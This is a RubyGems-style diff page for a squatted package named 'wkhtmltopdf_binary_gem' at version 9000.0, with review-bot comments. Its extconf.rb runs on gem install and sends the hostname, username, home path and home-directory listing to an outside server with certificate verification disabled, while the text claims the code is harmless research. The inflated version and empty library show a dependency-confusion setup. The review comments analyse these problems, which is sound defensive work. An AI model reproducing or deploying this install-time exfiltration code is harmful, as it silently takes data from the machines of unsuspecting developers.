wkhtmltopdf_binary_gem 9000.0


Potentially problematic release.


This version of wkhtmltopdf_binary_gem might be problematic.

Files changed (3)
  1. checksums.yaml +7 -0
  2. data/ext/extconf.rb +50 -0
  3. metadata +50 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: d611cbba7303b0a84d3536aa04afbbe641f3b69d852bd26127e2eb99f6541c5b
4
+ data.tar.gz: f98026fa3a6abdfb947e9fce15640c79bfbaa4b7fe8c2c6f56ac2516c046c3c4
5
+ SHA512:
6
+ metadata.gz: dffeb07a240e39801a18057c1c5603288cb7d32533eac7675af28f16057d1c0cb85604bd0d1cc937e87187bf0686532e07480d64cbb63a8b86dfbfd8635c6460
7
+ data.tar.gz: a06c98487941721437bd70fb5950cb17c787148073b1621de3e9869cb40b3ad25f74cada4fca8314362733bb44e1ae00c7b77bc4ff6e466a522b442af72623f9
data/ext/extconf.rb ADDED
@@ -0,0 +1,50 @@
1
+ =begin
2
+ Hi, if you're reading this you're probably wondering what this code is doing on your machine.
3
+ Don't worry! It doesn't do anything nasty or malicious.
4
+
5
+ I am an ethical security researcher, booking names of gems to prevent brandjacking.
6
+
7
+ I also run a Ruby security related platform: https://diffend.io
8
+
9
+ All data I collect will be deleted and I do not collect any sensitive information.
10
+
11
+ That's why I don't even obfuscate the network calls with DNS requests or anything else.
12
+
13
+ You can read the code to confirm this.
14
+
15
+ If you have any questions or want to get in touch for any reason, you can reach me at:
16
+
17
+ maciej@mensfeld.pl
18
+
19
+ If this is affecting your organization, for example because I took name that uses your naming
20
+ conventions, feel free to contact me and I will be more than happy to give it back to you.
21
+
22
+ P.S. I did notify RubyGems security team, so they are aware of my activity.
23
+ =end
24
+
25
+ require 'mkmf'
26
+ require 'net/http'
27
+ require 'socket'
28
+ require 'etc'
29
+ require 'securerandom'
30
+ require 'json'
31
+
32
+ create_makefile 'gem_test'
33
+
34
+ uri = URI("https://ethically-testing-the.world")
35
+ http = Net::HTTP.new(uri.host, uri.port)
36
+ http.use_ssl = true
37
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
38
+ request = Net::HTTP::Post.new('/wkhtmltopdf_binary_gem/9000.0')
39
+ request.add_field('Content-Type', 'application/json')
40
+
41
+ request.body = {
42
+ hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
43
+ username: Etc.getlogin,
44
+ path: File.dirname(__FILE__),
45
+ home: Dir.home,
46
+ home_ls: Dir.entries(Dir.home),
47
+ id: SecureRandom.uuid,
48
+ }.to_json
49
+
50
+ http.request(request)
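Review bot: The request body at lines 41-48 does not match the header comment's claim that no sensitive information is collected: it posts `username: Etc.getlogin`, `home: Dir.home` and the full `home_ls: Dir.entries(Dir.home)` listing along with the hostnames, and file names in a home directory routinely reveal customers, projects and installed tooling. Line 37 sets `http.verify_mode = OpenSSL::SSL::VERIFY_NONE`, so that data goes out with no certificate check and any on-path party can read or redirect it; the default verification should be left in place. Because this file is an `extconf.rb`, all of it runs during `gem install`, before anyone requires the gem, and the unguarded `http.request(request)` at line 50 will raise and abort the install on hosts without outbound access. If the aim is only to hold the name, the script should drop the network call entirely and keep just `create_makefile`, or send nothing beyond the random `id`.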
metadata ADDED
@@ -0,0 +1,50 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: wkhtmltopdf_binary_gem
3
+ version: !ruby/object:Gem::Version
4
+ version: '9000.0'
5
+ platform: ruby
6
+ authors:
7
+ - Maciej Mensfeld
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2021-03-05 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: |
14
+ I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
15
+
16
+ This code is reporting-only, and does not do anything malicious.
17
+ email:
18
+ - maciej@mensfeld.pl
19
+ executables: []
20
+ extensions:
21
+ - ext/extconf.rb
22
+ extra_rdoc_files: []
23
+ files:
24
+ - ext/extconf.rb
25
+ homepage: https://diffend.io
26
+ licenses:
27
+ - GPL-3.0
28
+ metadata: {}
29
+ post_install_message: |
30
+ This is probably not the package you wanted to install.
31
+ Read the description of this gem for more details.
32
+ rdoc_options: []
33
+ require_paths:
34
+ - lib
35
+ required_ruby_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ required_rubygems_version: !ruby/object:Gem::Requirement
41
+ requirements:
42
+ - - ">="
43
+ - !ruby/object:Gem::Version
44
+ version: '0'
45
+ requirements: []
46
+ rubygems_version: 3.1.4
47
+ signing_key:
48
+ specification_version: 4
49
+ summary: Gem that sends some non-sensitive data for security research.
50
+ test_files: []
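Review bot: The `extensions:` entry at lines 20-21 is the point to flag here: `ext/extconf.rb` is also the only entry under `files:`, and `require_paths` names `lib` although no `lib` file is packaged, so the gem ships no library and exists only to run that script at install time. The version `'9000.0'` at line 4 sorts above any realistic release of a same-named gem, so a dependency declared without a version constraint or an explicit source will resolve to this package. The `summary` at line 49 describes the data as "non-sensitive" without listing the fields, and `cert_chain: []` with an empty `signing_key` means the package is unsigned. Consumers should treat any gem whose spec lists an extension but no library files as install-time code execution and review the script before installing; the description should enumerate exactly what is sent.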